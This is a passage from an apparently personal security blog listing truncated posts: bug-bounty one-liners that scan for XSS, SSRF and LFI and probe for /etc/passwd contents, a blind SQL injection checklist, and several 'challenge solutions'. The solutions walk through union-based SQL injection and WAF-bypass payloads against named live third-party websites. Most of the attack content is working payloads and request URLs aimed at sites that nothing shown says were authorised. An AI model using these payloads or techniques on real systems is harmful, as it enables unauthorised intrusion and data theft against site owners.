Posts

Showing posts from June 27, 2021

Bug Bounty Helpful Commands

To get URLs from websites:

waybackurls target.com | tee urlss.txt
dalfox file urlss.txt pipe

XSS

cat file.txt | gf xss | grep 'source=' | qsreplace '"><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \033[0;31mVulnerable\n"; done

SSRF

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net

LFI

Follow this command to find LFI:

findomain -t example.com -q | waybackurls | gf lfi | qsreplace FUZZ | while read url; do ffuf -u $url -mr "root:x" -w ~/wordlist/LFI.txt; done

find JS files on target.com https:/...

Advance Blind SQLi

Hi guys, now I am sharing 20 lines of tips with you to find SQLi and vulnerable columns in a website.

20 lines tips for Advance Blind SQLi

1. post data
2. Vulnerable product=*
3. product=1'
4. Blank page
5. product=1'--+
6. Same blank
7. product=1')--+ product available
8. product=1') group by 1--+ blank page
9. product=1') order/*_*/by 1--+ blank page
10. product=1')--+ product available
11. product=1') order by 11--+ blank page
12. product=1') order by 10--+ product available
13. Columns 10 Let's find vulnerables
14. product=1') and 0 Union Select
15. 1,2,3,4,5,6,7,8,9 10--+ blank page
16. product=1') union select 1,2,3,4,5,6,7,8,9,10--+ blank page
17. product=1') Union/*_*/SeLect 1,2,3,4,5,6,7,8,9,10--+ product available
18. product=1') and 0 ======== blank page
19. product=1') and point (29,1)
20. UnIon/*_*/SeLect 1,2,3,4,5,6,7,8,9,10--+

Vulnerable column 2 and 4

Bounty $$$$$$

Thanks.........

SQLi-5 Solution

SQLi Solution

SQLi-4 Solution

SQLi Solution

my solution for :::: SQLi

the link : http://bwcrank.com/Download.php?cid=10

let's count the columns

http://bwcrank(.)com/Download.php?cid=10 order by 100 -- -

waf :: 您所提交的请求含有不合法的参数,已被网站管理员设置拦截!

http://bwcrank(.)com/Download.php?cid=10 order by 100 -- -

let's bypass order by >> /*!/*'GHI'*/ xxx */

http://bwcrank(.)com/Download.php?cid=10 /*!/*'ghi'*/order*/ /*!/*'ghi'*/by*/100-- -

done with error

?cid=10 /*!/*'ghi'*/order*/ /*!/*'ghi'*/by*/1-- - no error

?cid=10 /*!/*'ghi'*/order*/ /*!/*'ghi'*/by*/2-- - error

column count 1

http://bwcrank(.)com/Download.php?cid=10 /*!/*'*/UnIoN*/ /*!/*'*/select*/ 1 -- -

work good

for this rule

* to add your name don't use Hex like 0xBlackRose -for all letters at the same time- , Character Chart CHAR(104) , Binary 0bBlackRose , and you can't add yo...

SQLi-3 Solution

solution for {SQLi CHALLENGE }

the link to test

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184

first let's get column count

manifestation_id=184 order by 7 -- - error

manifestation_id=184 order by 6 -- - no error

column count is 6

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,5,6 -- -

now there are no vulnerable columns on the page

I think you will now make all columns null or search in the page source

but not all columns need to be false, some columns need to be true to fix, like 1,1,1-- -

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,1,1,1,1,1 -- -

work good

column 5 needs to be fixed by making it true

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,1,6 -- -

and as ' false ' I can add ' true ' to the column to fix it, like

1,2,3,4,true,...

SQLi-3 Solution

My solution for {challenge -1}

Level :: normal

Site>> https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312

https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312'

Some content of this site is missing when (') is added.

Let's count the number of columns.

https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312' order by 100-- - ❌

https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312' order by 1-- - ❌

Same result.

Ok, when we add an (@) before the parameter value, we can see some content of this site changes.

https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=@312' order by 100-- - ❌

https://www.direct-seychelles.com/.....

SQLi-2 Solution

<----Solution---->

/**_**/ Let's start /**_**/

Site: https://androssov.ru/briefly/post.php?id=1

**Ok, let's check whether the site is vulnerable or not

--> https://androssov.ru/briefly/post.php?id=1'

Ok, when we add an (') after the parameter value, we can see some content of this site is missing.

**Ok, let's try to fix the site

--> https://androssov.ru/briefly/post.php?id=1'--+-

Ok, the site is fixed

**Let's count the number of columns.

--> https://androssov.ru/briefly/post.php?id=1' order by 10--+- Error❌

--> https://androssov.ru/briefly/post.php?id=1' order by 9--+- Fixed

That means this site has 9 columns..✅

**Ok, let's select the union

--> https://androssov.ru/briefly/post.php?id=1'UNION SELECT 1,2,3,4,5,6,7,8,9--+-❎

Oops, it shows 403 Forbidden❌

**Let's try another way to fix the error.

--> https://androssov.ru/briefly/post...

SQLi Challenges Solution

Please follow the steps

===========Solution===========

http://zoutou(.)net/news_shousai.php?key=17

Let's start checking vulnerability adding '

http://zoutou(.)net/news_shousai.php?key=17'

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" at character 59 in /home/zoutou-web/public_html/news_shousai.php on line 99

This is the error. Let's fix this.

http://zoutou(.)net/news_shousai.php?key=17'--+-

Not fixing

Let's try

http://zoutou(.)net/news_shousai.php?key=17--

Yes. Fixed. As it fixes with --

Let's count columns.

http://zoutou(.)net/news_shousai.php?key=17 order by 1-- 💡

http://zoutou(.)net/news_shousai.php?key=17 order by 100-- 💔

As 1 has no error
And 100 has error
So, it means, it will work here

In 5 we got no error
In 6 we got error
So, total possible column is 5

Let's Union select

http://zoutou(.)net/news_shousai.php?key=17+AND+0+UNION+SELECT+1,2,3,4,5--

But still error. Let's...
